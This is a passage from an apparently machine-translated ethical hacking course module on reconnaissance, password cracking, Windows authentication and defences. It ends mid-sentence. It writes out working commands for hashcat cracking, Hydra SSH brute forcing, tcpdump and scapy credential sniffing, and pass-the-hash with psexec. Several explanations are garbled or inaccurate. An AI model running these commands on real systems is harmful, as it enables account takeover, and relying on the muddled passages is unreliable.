Recognition, also called footprinting, is the process of accumulating data about a
specific network environment. In general, this technique is applied in order to
find ways to get into the network environment. Since the footprint can be used
to attack a system, it can also be used to protect it. In the recognition phase, the attacker
builds a profile of the target organization, with information such as its range of IP
addresses, its namespace and the employees' use of the website.

The footprint improves the ease with which systems can be exploited by revealing system
vulnerabilities. The determination of the target and the location of an intrusion is the main step
involved in the footprint. Once the target and location of an intrusion is known, by using non-
intrusive methods, specific information about the organization can be collected.

For example, the organization's website itself can provide biographies of employees or a
personnel directory, which the hacker can use for social engineering to achieve the goal. The
completion of a Whois query on the web provides associated networks and domain names related
to a specific organization.
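For instance, a simple query with the standard whois client illustrates the kind of passive information gathering described above; the domain is a placeholder.

whois example.com    # registrant, administrative contacts, name servers and related netblocks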
 Scanning
Scanning is a procedure to identify active hosts in a network, either to evaluate the
security of the network or to attack them. Building on the recognition phase, the attacker
evaluates the target through the IP addresses that can be reached over the
Internet. Scanning refers mainly to the identification of systems in a
network and the identification of the services that run on each computer.

Some scanning procedures, such as port scans and ping sweeps, return information about
the services offered by the hosts that are active on the Internet and their IP addresses. The
reverse mapping scan procedure returns information about IP addresses that are not assigned to
live hosts, which allows an attacker to make assumptions about feasible addresses.

 Enumeration
Enumeration is the method of intrusive inquiry in evaluating the objective through which
attackers actively collect information, such as lists of network users, routing tables, and
simple network management protocol (SNMP) data. This is significant because the
attacker crosses the target territory to unearth information about the network and users,
groups, applications and banners.

The aim of the attacker is to identify valid user accounts or groups in which he can remain
discreet once the system has been compromised. Enumeration involves making active
connections to the target system or submitting it to direct queries. Normally, an alert and
secure system will log such attempts. Often, the information collected is what the target
might have made public, such as a DNS address; however, it is possible for the attacker to stumble
upon a remote IPC share, such as IPC$ in Windows, which can be probed with a null session that
allows shares and accounts to be enumerated.

Objectives of an IT Attack

Every criminal commits a crime to achieve a certain objective. Similarly, an attacker can also
have certain objectives behind performing attacks on a system. The following may be some of
the goals of attackers when committing attacks against a system. The following list shows the
objective of an attacker at different stages of hacking and the technique used to achieve each goal.

 Gain access: to gather enough information to get access


 Privilege escalation: to create a privileged user account if the user level is obtained
 Application Execution: to create and maintain backdoor access
 Hide files: to hide malicious files
 Delete fingerprints: to hide the evidence of compromise

Password decryption
The decryption of passwords is the process of recovering passwords from data that has been
transmitted by a computer system or stored in it. The purpose of decrypting passwords could be
to help the user to recover a forgotten or lost password, as a preventive measure on the part of the
administrators of the system to look for easy passwords to decipher or it can also be used to
obtain unauthorized access to a system.

Many attempts at computer attacks begin with attempts to decrypt passwords. Passwords are the
key information needed to access a system. As a result, most attackers use password-cracking
techniques to gain unauthorized access to the vulnerable system. Passwords can be decrypted
manually or with automated tools, such as a dictionary or brute force method.

The effectiveness of computer programs designed to decipher passwords is a function of the number of
candidate passwords per second that they can verify. Often, when creating passwords, users select
passwords that are predisposed to being cracked, such as a pet's name, or choose something
simple so they can remember it. Most password-cracking techniques succeed because of weak
or easily guessed passwords.

The complexity of the password

The complexity of the password plays a key role in improving security against decryption
attacks. It is the important element that users must guarantee when creating a password. The
password should not be simple, since simple passwords are prone to attack. The passwords you
choose should always be complex, long and hard to guess. The password that you are
configuring for your account must comply with the complexity requirements
policy.

How to create a secure password in 2018

The password characters should be a combination of several character classes: letters,
numbers, punctuation marks, mathematical symbols and other conventional symbols.

Password decoding techniques

Password decryption is the technique used to discover passwords. It is the classic way to obtain
privileges on a computer system or network. The common approach to deciphering a password
is to repeatedly guess the password with various combinations until you get the correct
one. There are five techniques to decrypt passwords (a command-line sketch using a cracking tool follows the list):

1. Dictionary attacks: in a dictionary attack, a dictionary file is loaded into the cracking
application and run against user accounts. The dictionary is a text file that contains
a large number of candidate words. The program tries each word present in the dictionary to
find the password. Dictionary attacks are more efficient than brute force attacks, but this
attack does not work against a system that uses passphrases.

This attack can be applied in 2 situations:

 In cryptanalysis, it is used to discover the decryption key to get plain text from the
encrypted text.
 In computer security, to avoid authentication and access the computer by guessing
passwords.

Methods to improve the success of a dictionary attack:

 Use a number of dictionaries, such as technical dictionaries and foreign-language dictionaries,
to improve the chances of recovering the correct password
 Use string manipulation on the dictionary words; for example, if the dictionary contains the word
"system", also try manipulated variants such as the reversed string "metsys".

2. Brute Force Attacks: the cryptographic algorithms must be sufficiently hardened to avoid a
brute force attack. The definition as established by RSA: "The exhaustive search of keys or the
search of brute force is the basic technique to test all the possible keys until the correct key is
identified".

When someone tries to produce each and every one of the encryption keys for data until the
necessary information is detected, this is called brute force attack. Until this date, this type of
attack was carried out by those who had sufficient processing power.

The US government once believed (in 1977) that the 56-bit Data Encryption Standard (DES) was
sufficient to deter all brute force attacks, a claim that several groups around the world later put to the test.

Cryptanalysis by brute force is an exhaustive search of the key
space: all possible keys are tried in an attempt to recover the plaintext
used to produce a particular ciphertext. Recovering the key or the plaintext at a faster pace than
a brute force attack can be considered a way of breaking the encryption. An encryption scheme is considered secure if there
is no method to break it other than a brute force attack. For the most part, ciphers
lack a mathematical proof of security.

If the keys are originally chosen randomly or are randomly searched, the plain text, on average,
will be available after testing half of all the possible keys.

Some of the considerations for brute force attacks are the following:

 It is a slow process
 All passwords will eventually be found
 Attacks against NT hashes are much more difficult than attacks against LM hashes
3. Hybrid attack: this type of attack depends on the attack of the dictionary. There are
possibilities for people to change their password simply by adding some numbers to their
previous password. In this type of attack, the program adds some numbers and symbols to the
dictionary words and tries to decrypt the password. For example, if the previous password is
"system", there is a possibility that the person changes it to "systeml" or "system2".

4. Syllable attack: A syllable attack is the combination of a brute force attack and a dictionary
attack. This decryption technique is used when the password is not an existing word. Attackers
use the dictionary and other methods to decipher it. It also uses the possible combination of each
word present in the dictionary.

5. Rule-based attack: This type of attack is used when the attacker obtains information about
the password. This is the most powerful attack because the cracker knows the type of password.
For example, if the attacker knows that the password contains a two- or three-digit number, he
will use some specific techniques and extract the password in less time.

By obtaining useful information, such as the use of numbers, the length of the password and
special characters, the attacker can easily adjust the password recovery time to a minimum and
improve the decryption tool to recover passwords. This technique involves brute force attacks,
dictionary and syllables.
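As a hedged, minimal sketch of the dictionary, rule-based and brute force techniques described above, the following hashcat invocations could be used against NTLM hashes in a lab; the hash file, wordlist and rule file paths are placeholders.

hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt                   # straight dictionary attack against NTLM hashes
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -r best64.rule    # dictionary words mutated by a rule set (rule-based/hybrid style)
hashcat -m 1000 -a 3 ntlm_hashes.txt ?d?d?d?d?d?d                  # brute force of all 6-digit candidates using a mask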

Types of password attacks

Password decryption is one of the crucial stages of hacking a system. Used
for legitimate purposes, it recovers a user's forgotten password; used by
illegitimate users for illegal purposes, it can give them unauthorized privileges on the
network or the system. Password attacks are classified according to the actions the attacker takes to
decrypt a password. Generally, there are four types:

1. Online passive attack: a passive attack is an attack on a system that does not result in any
change to the system. The attack simply monitors or records data. A passive
attack on a cryptosystem is one in which the cryptanalyst cannot interact with any of the
parties involved and tries to break the system based solely on observed data. There are
three types of online passive attacks:

 Wire sniffing
 Man in the middle
 Replay

2. Online active attack: an active online attack is the easiest way to gain unauthorized
administrator-level access to the system. The main types of active online attacks are:
 Guess password
 Trojan horse, spyware or keylogger
 Hash injection
 Impersonation (Phishing)

3. Offline Attack: Offline attacks occur when the intruder verifies the validity of the passwords.
He or she observes how the password is stored in the target system. If usernames and passwords
are stored in a readable file, it is easy for the intruder to access the system. To protect your list of
passwords, they must always be kept in an illegible form, which means they must be encrypted.

Offline attacks often consume a lot of time. They are successful because LM hashes are
vulnerable due to their smaller keyspace and shorter effective length.

These attacks can be prevented in the following ways:

 Using good passwords


 Remove LM hash
 Use cryptographically secure methods while representing passwords

There are three types of off-line attacks:

 Hashes pre-calculated
 Distributed network
 Rainbow (Rainbow)

4. Non-electronic attacks: non-electronic attacks are also known as non-technical attacks. This
type of attack does not require any technical knowledge about the methods of intrusion into the
system of another. Therefore, it is called non-electronic attack. There are three types of non-
electronic attacks:

 Spy the victim over his shoulder, while entering the password: (Shoulder surfing)
 Social engineering
 Check the garbage for the password written somewhere (Dumpster diving)

Passive attack online: Wire Sniffing

Wire sniffing means listening on the network to see whether a password is transmitted in the clear; a packet sniffer
tool is rarely usable for an attack. This is because a sniffer can only work within a common collision
domain, that is, a segment that is not separated by a switch or bridge, where none of the hosts in that
network segment are switched or bridged apart from each other.
As sniffers gather packets at the data link layer, they can capture all packets on the LAN of the
machine running the sniffer program. This method is relatively difficult to perpetrate and is
computationally complicated.

This is because a network with a hub implements a broadcast medium that all systems share on
the LAN. Any information sent through the LAN is sent to each and every one of the machines
connected to the LAN. If an attacker runs a sniffer on a LAN system, it can collect data sent to
any other system on the LAN, and from it. Most sniffer tools are ideal for sniffing data in a
hub environment. These tools are called passive sniffers, since they passively wait for the
data to be sent before capturing the information. They are efficient at the imperceptible
collection of data from the LAN. The captured data can include passwords sent to remote
systems during Telnet, FTP and rlogin sessions, as well as email sent and received. The sniffed credentials
are then used to gain unauthorized access to the target system. A variety of tools for passive wire
sniffing are available on the Internet.
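A minimal passive capture on a shared (hub or SPAN-mirrored) segment could look like the following tcpdump invocation; the interface name is a placeholder and the capture must only be run on networks you are authorized to monitor.

tcpdump -i eth0 -A 'port 21 or port 23 or port 110'    # print FTP, Telnet and POP3 traffic as ASCII, where credentials travel in cleartext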

Passive attack online: Man-in-the-Middle and Relay attacks

When two parties communicate, a man-in-the-middle attack can take place. In this case, a third
party intercepts the communication between the two parties while assuring both parties that they
are communicating directly with each other. Meanwhile, the third party alters the data, or simply listens and passes the
data along. To accomplish this, the man in the middle has to sniff both sides of the
connection simultaneously. This type of attack is often seen in telnet and wireless technologies.
Such attacks are not easy to implement because of TCP sequence numbers and transmission speed.
This method is relatively difficult to perpetrate and can sometimes be broken by invalidating
the traffic.

In a replay (relay) attack, packets are captured using a sniffer. After the relevant
information has been extracted, the packets are placed back on the network. This type of attack can be used to replay
bank transactions or other similar types of data transfer in the hope of replicating or changing
activities, such as deposits or transfers.

Online active attack: guess passwords

Everyone knows your username, but your password is a well-kept secret to prevent others from
accessing your transactions.

With the help of dictionary attack methodologies, an intruder tries many means to guess his
password. In this methodology, an attacker takes a set of words and dictionary names, and makes
all possible combinations to obtain their password. The attacker performs this method with
programs that guess hundreds or thousands of words per second. This allows them to try many
variations: words backwards, different capitals, add a digit at the end, etc.
To further facilitate this, the attacking community has created large dictionaries that include
foreign language words or names of things, places and cities modeled to decipher passwords.
Attackers can also scan your profiles to search for words that can break your password. A good
password is easy to remember, but hard to guess, so you must protect your password by making
it appear random when you insert items such as digits and punctuation. The more intricate your
password, the harder it will be for the attacker to break it.

Some of the considerations for guessing passwords are the following (a sample tool invocation follows this list):

 It takes a long time to find the correct password


 Requires large amounts of network bandwidth
 Can be easily detected
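A hedged example of online password guessing against a lab service is shown below; the wordlist, user name and IP address are placeholders.

hydra -l admin -P passwords.txt ssh://192.168.56.101    # try every password in the list against the admin account over SSH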

Active online attack: Trojans, spyware and keyloggers

Trojan is a destructive program that hides as a benign application. Before the installation or
execution, the software initially seems to perform a convenient function, but in practice it steals
information or damages the system. With a Trojan, attackers can have remote access to the target
computer and perform various operations that are limited by the user's privileges on the target
computer, by installing the Trojan.

Spyware is a type of malware that can be installed on a computer to collect information about
computer users without their knowledge. This allows attackers to collect information about the
user or organization secretly. The presence of spyware is usually hidden from the user and can be
difficult to detect.

Keylogger is a program that registers all keystrokes that are written on the computer keyboard
without the knowledge of the user. Once the keystrokes are registered, they are sent to the
attacker or hidden in the machine for later retrieval. The attacker examines them carefully in
order to find passwords or other useful information that can be used to compromise the system.

For example, a keylogger is able to reveal the content of all emails composed by the user of the
computer system in which the keylogger has been installed.

Online active attack: Hash injection attack

A hash injection attack is the concept of injecting a compromised hash into a local session and
then using the hash to authenticate itself to network resources. This attack is carried out
successfully in four steps:

1. The hacker compromises a workstation/server using a local/remote exploit.


2. The hacker extracts the stored logon hashes and finds the hash of a logged-on domain
administrator account.
3. The hacker uses that hash to log on to the domain controller.
4. The hacker extracts all the hashes in the Active Directory database and can now impersonate
any account in the domain (a lab sketch of this technique follows).
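One common way to demonstrate pass-the-hash style authentication in a lab uses Impacket's psexec.py, assuming the toolkit is installed; the hashes, account and IP address below are placeholders (the NT hash shown is the well-known hash of the word "password").

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.56.101    # authenticate with the captured hash instead of a password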

Online active attack: rainbow tables

Offline attacks occur when the intruder checks the validity of passwords outside the live system.
He or she observes how the passwords are stored: if user names and passwords are kept in a
readable file, it will be easy for the attacker to access the system. Therefore, the list of
passwords must be protected and stored in an unreadable form, such as an encrypted or hashed form.

A rainbow attack is an implementation of the cryptanalytic time-memory trade-off technique. The
time-memory trade-off is a method that reduces the time needed for cryptanalysis by using
information calculated in advance and stored in memory. In the rainbow attack the same technique
is used: a table of password hashes is created in advance and stored in memory. Such a table is
called a "rainbow table".

 A rainbow table is a lookup table used to recover the plaintext password from a password
hash. The attacker uses this table to look up the captured hash and tries to retrieve the
corresponding password.

An attacker computes the hashes of a list of possible passwords and compares them with the
precomputed hash table (rainbow table). If a match is found, the password is recovered.

It is easy to recover passwords by comparing hashes of captured passwords with pre-calculated
tables.

Only hashed passwords should be stored in a file that contains username/password pairs. The typed
password is hashed with a cryptographic hash function during the login process and then compared
with the hash stored in the file.

Even stored password hashes can be useless against dictionary attacks. If the file containing the
hashed passwords is readable, the attacker can easily determine the hash function, hash every word
in the dictionary with it, and compare the result with the stored hashes. In this way the attacker
obtains every password that is a word listed in the dictionary.
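The following is a minimal sketch in plain Python of a precomputed hash-to-password lookup, the
core idea behind this kind of attack (a real rainbow table also uses chains and reduction
functions, which are omitted here). The wordlist and the "captured" hash are illustrative
assumptions.

import hashlib

wordlist = ["secret", "letmein", "dragon", "password"]

# Precompute once and store: hash -> plaintext
precomputed = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}

captured_hash = hashlib.md5(b"dragon").hexdigest()   # pretend this hash was captured

# Recovery is now a simple lookup instead of hashing every candidate again
print(precomputed.get(captured_hash, "not found"))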

Tools to create rainbow tables

 Winrtgen: a graphical rainbow table generator that helps attackers create rainbow
tables from which they can crack hashed passwords. It supports LM, FastLM, NTLM, LMCHALL,
HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1,
CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and SHA-2 (512) hashes.
 RainbowCrack: a general-purpose implementation that takes advantage of the time-memory
trade-off technique to crack hashes. This project allows you to crack a hashed password. The
rtgen tool in this project is used to generate the rainbow tables.

Offline attack: distributed network attack

A distributed network attack (DNA) is the technique used to recover password protected files. It
uses the unused processing power of machines on the network to decrypt passwords. In this
attack, a DNA administrator is installed in a central location where machines running DNA
clients can access it through the network. The DNA administrator coordinates the attack and
allocates small portions of the key search to machines distributed throughout the network. The
DNA client runs in the background, only taking the unused processor time. The program
combines the processing capabilities of all clients connected to the network and uses them to
perform a file key search to decrypt them.

Characteristics of a distributed network attack:

 Easy-to-read statistics and graphs
 Add user dictionaries to crack the password
 Optimize attacks for passwords in specific languages
 Modify user dictionaries
 Stealth client installation functionality
 Automatically update the client when the DNA server is updated
 Control clients and identify the work done by each client

DNA (Distributed Network Attack) is divided into 2 parts:

1. DNA server interface: allows users to manage the DNA of a server. The DNA server
module provides the user with the status of all jobs that the DNA server is running. This
interface is divided into:

 Current jobs: the current job queue holds all the jobs that the controller has added to the
list. The current job list has many columns, such as the identification number that the
DNA has assigned to the job, the name of the encrypted file, the password that the user
has used, the password that matches a key that can unlock the data, the status of the
job and several other columns.
 Completed jobs: the completed jobs list provides information about the jobs that have been
cracked, including the password. The completed jobs list also has many columns that are
similar to the current job list. These columns include the identification number assigned
by the DNA to the job, the name of the encrypted file, the decrypted path of the file, the
key used to encrypt and decrypt the file, the date and time the DNA server started and
finished working on the job, the elapsed time, etc.

2. DNA client interface: can be used from many workstations. Client statistics can be easily
coordinated through the DNA client interface. This interface is available on machines
where the DNA client application has been installed. It has many components, such as the
name of the DNA client, the name of the group to which the DNA client belongs, statistics about
the current job and many other components.

The network traffic application in Windows is used for network management purposes. The
Network Traffic dialog box shows the network speed used by the DNA and the length of each
work unit of the DNA client. Using the work-unit length, a DNA client can work without
contacting the DNA server; the DNA client application only contacts the DNA server at the
beginning and at the end of each work unit.

The user can control the job status queue and the DNA. With the data collected from the Network
Traffic dialog box, the client's work-unit length can be modified. When the length of
the work unit increases, the speed of network traffic decreases. If traffic has been reduced, the
client's jobs take longer to complete; therefore, fewer requests are made to the server because
of the reduced network bandwidth.

Recommended Tools

Elcomsoft Distributed Password Recovery allows you to break complex passwords, recover strong
encryption keys and unlock documents in a production environment. It runs mathematically
intensive password recovery code on the massively parallel computational elements found in modern
graphics accelerators. It uses this technology to accelerate password recovery when an ATI or
NVIDIA compatible graphics card is present, in addition to a CPU-only mode. Compared with
password recovery methods that use only the computer's main CPU, the GPU acceleration used by
this technology makes password recovery much faster. It supports recovering passwords for a
variety of applications and file formats.

Non-electronic attacks

Non-electronic attacks are also called non-technical attacks. This type of attack does not require
any technical knowledge of methods for intruding into another system; that is why it is called a
non-electronic attack. There are four types of non-electronic attacks: social engineering,
shoulder surfing, keyboard sniffing and dumpster diving.
Dumpster diving is a key attack method that points to a substantial flaw in IT security: the same
information that people crave, protect and devoutly secure can be obtained by almost anyone
willing to go through the target's garbage. It allows an attacker to gather information about
target passwords by looking through the trash. This type of low-tech attack has many implications.

Because security practices were weaker then, dumpster diving was quite popular in the 1980s. The
term refers to any useful, general information that is found and taken from areas where it has
been discarded. These areas include trash cans, dumpsters, garbage containers and the like, from
which information can be obtained for free. Curious or malicious attackers can find passwords,
manuals, confidential documents, reports, receipts, credit card numbers or diskettes that have
been discarded. The best way to counteract this is to destroy valuable files and discard them in
a format that is unreadable for humans.

Simply examining the waste that has been dumped in garbage areas can be useful to attackers, and
there is ample information to support this concept. This useful information was thrown away
without a thought as to whose hands it might reach. Attackers can use this data to gain
unauthorized access to the target's computer systems, or the objects found can enable other types
of attacks, such as those based on social engineering.

Shoulder surfing is when an intruder stands discreetly near a legitimate user and watches as the
password is entered. The attacker simply looks at the user's keyboard or screen during login and
observes whether the user is checking the desktop for a password reminder or typing the actual
password. This is only possible when the attacker is physically close to the target.

This type of attack can also occur in the checkout line of a grocery store, when a potential
victim is swiping a debit card and entering the required PIN. Many of these personal
identification numbers have only four digits.

Eavesdropping refers to the act of secretly listening to someone's conversation. Passwords can
be determined by secretly listening to password exchanges. If the attacker does not get your
password by guessing, there are other ways he or she can try to obtain it.

Password Sniffing" It is an alternative used by hackers to obtain their destination passwords.


Most networks use broadcast technology, which means that every message a computer
transmits on the network can be read by every computer connected to that network. In practice,
all computers except the recipient of the message will notice that the message is not
intended for them and will ignore it. However, a computer can be configured to look at every
message transmitted by a specific computer on the network. In this way, one can read the
messages that are not intended for it. Hackers have programs to do this, and they then
scan all the messages traversing the network looking for passwords.

You can end up giving your password to the attacker if you log into a computer over a network in
which some machine has been compromised in this way. Using this password sniffing technique,
hackers have collected thousands of passwords from computers connected to widely used networks.
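As a hedged illustration of the idea (not a tool endorsed by this course), the sketch below uses
the third-party scapy library to watch unencrypted HTTP traffic for form fields that commonly
carry credentials. It requires scapy to be installed, root privileges, a network you are
authorized to test, and the interface name "eth0" is an assumption.

from scapy.all import sniff, Raw, TCP

def inspect(pkt):
    # Look inside unencrypted HTTP payloads for credential-like form fields
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if b"password=" in payload or b"pwd=" in payload:
            print(payload[:200])

# Capture HTTP traffic without storing packets in memory
sniff(iface="eth0", filter="tcp port 80", prn=inspect, store=False)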

Social Engineering in computer security is the term that represents a non-technical type of
intrusion. This usually depends to a large extent on human interaction and often involves tricking
others into breaking normal safety procedures. A social engineer executes a "deception" to break
the security procedures. For example, an attacker who uses social engineering to enter a
computer network will try to gain the trust of someone authorized to access the network and then
try to extract information that compromises the security of the network.

The objective of social engineering is to obtain confidential information by deceiving or
influencing people. An attacker can pose as a user or system administrator to obtain a user's
password. It is natural for people to be helpful and trusting; in general, people strive to build
friendly relationships with friends and colleagues. Social engineers take advantage of this
tendency.

Another facet of social engineering relies on people's inability to keep up with a culture
that depends heavily on information technology. Most people are unaware of the value of the
information they hold and are careless about protecting it. Attackers take advantage of this
fact. Typically, social engineers look for holders of valuable information: a social engineer
would have more difficulty obtaining the combination of a safe, or even the combination of a gym
locker, than a password. The best defense is to educate, train and raise awareness.

Default passwords, as we saw in previous modules of this computer security course, are the
passwords supplied by manufacturers with new equipment. In general, they remain an important
risk factor.

There are many online sites with information about devices and their default passwords:

 DefaultPassword.info
 DefaultPassword.us
 PasswordsDatabase.com
 router password

Manual password cracking involves attempting to log in with different passwords. Guessing is the
key element of manual password cracking. The password is the key piece of data needed to access
the system, and a cracked password can then be used for privilege escalation, application
execution, file hiding and covering tracks. Attackers attempt many password-cracking techniques
to gain access to a target's system. Passwords can be cracked manually or with automated tools,
methods and algorithms.

Microsoft Authentication

 SAM

SAM stands for Security Account Manager. The SAM database is used by Windows to manage user
accounts and passwords in hashed format (one-way hash); passwords are never stored in plain
text. They are stored as hashes to protect them from attacks. The SAM database is implemented as
a registry file, and the Windows kernel obtains and maintains an exclusive file system lock on
it, which provides some measure of security for the storage of the passwords.

It is not possible to copy the SAM file to another location during an online attack: because
the SAM file is locked with an exclusive file system lock, it cannot be copied or moved while
Windows is running. The lock is not released until a blue-screen exception is thrown or the
operating system shuts down. However, the on-disk contents of the SAM file can be dumped using
various techniques, making the password hashes available for offline brute-force attacks.

Microsoft introduced the SYSKEY function in Windows NT 4.0 in an attempt to improve the
security of the SAM database against offline cracking software. When SYSKEY is enabled, the
on-disk copy of the SAM file is partially encrypted, so that the password hash values for all
local accounts stored in the SAM are encrypted with a key.

Even if its content were discovered by some subterfuge, the stored hashes are one-way, which
hinders breaking them. In addition, some versions use a security key that makes the encryption
specific to that copy of the operating system.

 NTLM

NTLM (NT LAN Manager) is a proprietary protocol used by many Microsoft products to perform
challenge/response authentication, and it is the default authentication scheme used by
Microsoft firewall and proxy server products. Third-party implementations also exist, for
example to allow Java technologies to work in a Microsoft-oriented environment; since these do
not depend on any official protocol specification, there is no guarantee that they will work
correctly in all situations, although they have worked successfully in some Windows
installations. NTLM authentication consists of two protocols: the NTLM authentication protocol
and the LM authentication protocol. These protocols use different hash methodologies to store
users' passwords in the SAM database.
 Kerberos

Kerberos is a network authentication protocol. It is designed to provide strong authentication
for client/server applications through the use of secret-key cryptography. It provides mutual
authentication: both the server and the user verify each other's identity. Messages sent
through the Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos makes use of Key Distribution Center (KDC), a trusted third party. This consists of two
logically distinct parts: authentication server (AS) and a ticket granting server (TGS).

The Kerberos mechanism provides the user with a Ticket Granting Ticket (TGT) that is later
exchanged for service tickets used to authenticate to specific services. This enables single
sign-on, so the user is not required to re-enter the password for each service he or she is
authorized to use. It is important to keep in mind that there is no direct communication between
the application servers and the Key Distribution Center (KDC): service tickets, even though they
are issued by the TGS, only reach a service through the client that wishes to access it.

 Salting

Salting is a way to make stored passwords safer by adding a random character string to the
password before its hash (for example MD5) is calculated. This makes cracking passwords more
difficult. The longer the random string, the harder it will be to break or crack the password.

The random string of characters must be a combination of alphanumeric characters. The level of
security or the strength of protection of your passwords against various password attacks
depends on the length of the random string of characters. This defeats pre-calculated hash
attacks.

In cryptography, a salt consists of random bits that are used as one of the inputs for a one-way
function and the other input is a password. Instead of passwords, the result of the unidirectional
function can be stored and used to authenticate users. A salt can also be combined with a
password by using a key derivation function to generate a key for use with an encryption or other
cryptographic algorithm.
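Here is a minimal sketch of salting before hashing, using only the Python standard library. A
production system should prefer a dedicated password-hashing scheme (bcrypt, scrypt, PBKDF2);
SHA-256 is used here only to keep the example dependency-free, and the sample password is an
illustrative assumption.

import hashlib, os

def hash_password(password: str):
    salt = os.urandom(16)                        # random salt, unique per user
    digest = hashlib.sha256(salt + password.encode()).digest()
    return salt, digest                          # store both; the salt is not secret

def verify(password: str, salt: bytes, stored: bytes) -> bool:
    return hashlib.sha256(salt + password.encode()).digest() == stored

salt, stored = hash_password("S3cure!pass")
print(verify("S3cure!pass", salt, stored))       # True
print(verify("guess", salt, stored))             # False

Because every user gets a different salt, an attacker cannot reuse a single precomputed table of
hashes, which is exactly why salting defeats rainbow-table style attacks.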

 NTLM v1 vs SAM vs NTLM v2

How to protect our password

Password cracking, also known as password hacking, is the term used for the process of
obtaining unauthorized use of a network, system or resource that is protected with a
password. The most basic way to crack a password is to guess it. Another way is to try many
combinations repeatedly, using a computer algorithm that tests combinations of characters until
a successful combination is found. If the password is weak, it can be cracked easily.

There are some recommended practices to protect against password cracking:

 Do not share your password with anyone, as this allows another person to access your
personal information, such as qualifications and payment statements, information that is
normally restricted to you.
 When changing a password, do not reuse the previous password or one that is substantially
similar to it.
 Enable security auditing to help monitor and track password attacks.
 Do not use passwords that can be found in a dictionary (see the example after this list).
 Do not use plain-text protocols (without encryption) or protocols with weak encryption.
 Avoid storing passwords in an insecure location; passwords stored in places such as plain
files on a computer are easily subject to attack.
 Do not use the default passwords of any system.
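As referenced above, a simple way to avoid dictionary words is to generate passwords randomly.
This minimal sketch uses only the Python standard library; the length of 12 characters is an
arbitrary choice consistent with the practices below.

import secrets, string

alphabet = string.ascii_letters + string.digits + string.punctuation

def generate_password(length: int = 12) -> str:
    # secrets (unlike random) is designed for security-sensitive randomness
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())   # e.g. 'q#7VgT!2p@Lr'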

Six good practices to protect against password cracking:

1. Make passwords difficult to guess by using eight to twelve alphanumeric characters in a
combination of uppercase and lowercase letters, numbers and symbols. Secure passwords
are hard to guess; the more complex the password, the less it is subject to attacks.
2. Make sure that applications do not store passwords in memory or write them to disk in
clear text. If passwords are stored in memory, they can be stolen. Once the password is
known, it is very easy for the attacker to escalate his or her privileges in the application.
3. Use a random string (salt) as a prefix or suffix of the password before hashing it. This
defeats precomputation and memorization: since the salt is usually different for every
user, it is not practical for the attacker to build tables with a single hashed version of
each candidate password. UNIX systems traditionally use a 12-bit salt.
4. Never use personal information to build a password, such as birth dates or the names of a
spouse, family members or pets. If you do, it is easy enough for people near you to guess
those passwords.
5. Check server logs for brute-force attacks on user accounts. Although brute-force attacks
are difficult to stop, they can easily be detected by monitoring the web server's logs.
6. For each unsuccessful login attempt, an HTTP status code of 401 is recorded in your web
server's logs; block an account that is subject to too many incorrect password guesses
(see the sketch after this list).
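The following is a hedged sketch of the log-monitoring idea from points 5 and 6: counting HTTP
401 responses per client IP in a web server access log. The path access.log, the combined/common
log format and the threshold of 20 are assumptions; adapt them to your own server.

from collections import Counter

THRESHOLD = 20
failures = Counter()

with open("access.log", encoding="utf-8", errors="replace") as log:
    for line in log:
        parts = line.split()
        # common log format: ip - - [date] "METHOD /path HTTP/1.1" status size ...
        if len(parts) > 8 and parts[8] == "401":
            failures[parts[0]] += 1

for ip, count in failures.items():
    if count >= THRESHOLD:
        print(f"Possible brute-force attack from {ip}: {count} failed logins")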

Recommended password cracking tools


 pwdump7 is an application that dumps password hashes from the NT SAM database. pwdump7
extracts the LM and NTLM password hashes of local user accounts from the SAM database. The
tool works by extracting the binary SAM and SYSTEM files from the file system, from which
the hashes are then extracted. One of the powerful features of pwdump7 is that it is also
capable of dumping protected files.

 fgdump is basically a tool for dumping passwords on Windows NT/2000/XP/2003/Vista
machines. It comes with built-in functionality that covers all the capabilities of pwdump
and can also do other crucial things such as run a remote executable file, dump the
protected storage on a remote or local host, and capture cached credentials.

 L0phtCrack is a tool designed to audit and recover passwords. It is used to recover lost
Microsoft Windows passwords with the help of brute force, dictionary, hybrid and rainbow
table attacks, and it is also used to check the strength of a password. The security flaws
inherent in the Windows password authentication system can easily be revealed with the help
of L0phtCrack.

 Ophcrack is a Windows password cracking tool that uses rainbow tables to crack passwords.
It comes with a graphical user interface and runs on different operating systems, such as
Windows, Linux, Unix, etc.

Features:

 Cracks LM and NTLM hashes
 Brute force module for simple passwords
 Real-time graphs to analyze the passwords
 Loads hashes from an encrypted SAM recovered from a Windows partition

 Cain & Abel, It is a password recovery tool. It runs on the Microsoft operating system,
allows you to recover various types of passwords by sniffing the network, decrypting
encrypted passwords using dictionary, brute force and cryptanalysis attacks, recording
VoIP conversations, decoding encrypted passwords and analyzing routing protocols.
With the help of this tool, passwords and credentials from various sources can be easily
recovered.

It consists of APR (ARP Poison Routing) that allows to trace switched LAN and man attacks in
the middle. The sniffer in this tool is also capable of analyzing encrypted protocols such as
HTTP and SSH-1, and contains filters to capture credentials of a wide range of authentication
mechanisms.

Escalation of Privileges
In a privilege escalation attack, the attacker gains access to the networks and their associated data
and applications, taking advantage of defects in the design, the software application, the
misconfigured operating systems, etc.

Once an attacker has gained access to a remote system with a valid username and password, he
will attempt to increase his privileges, such as that of an administrator. Privilege escalation is
required when you want to gain unauthorized access to specific systems. Basically, the escalation
of privileges takes place in two ways, horizontally and vertically.

 Horizontal privilege escalation: the unauthorized user tries to access the resources,
functions and other privileges belonging to an authorized user who has similar access
permissions. For example, online banking user A gains access to the bank account of user B.
 Vertical privilege escalation: the unauthorized user tries to gain access to the resources
and functions of a user with higher privileges than his or her own, such as an application
or site administrator.

For example, someone using online banking gains access to the site's administrative functions. In
summary, horizontal escalation seeks access to the functions of users with similar privileges,
while vertical escalation seeks access to administrator functions in order to control the entire
system.

Recommended tools

Privilege escalation tools allow you to safely and efficiently remove, restore or bypass Windows
passwords when you cannot log on to your computer. With the help of these tools, you can easily
access a locked computer by resetting a forgotten or unknown password. An attacker can use these
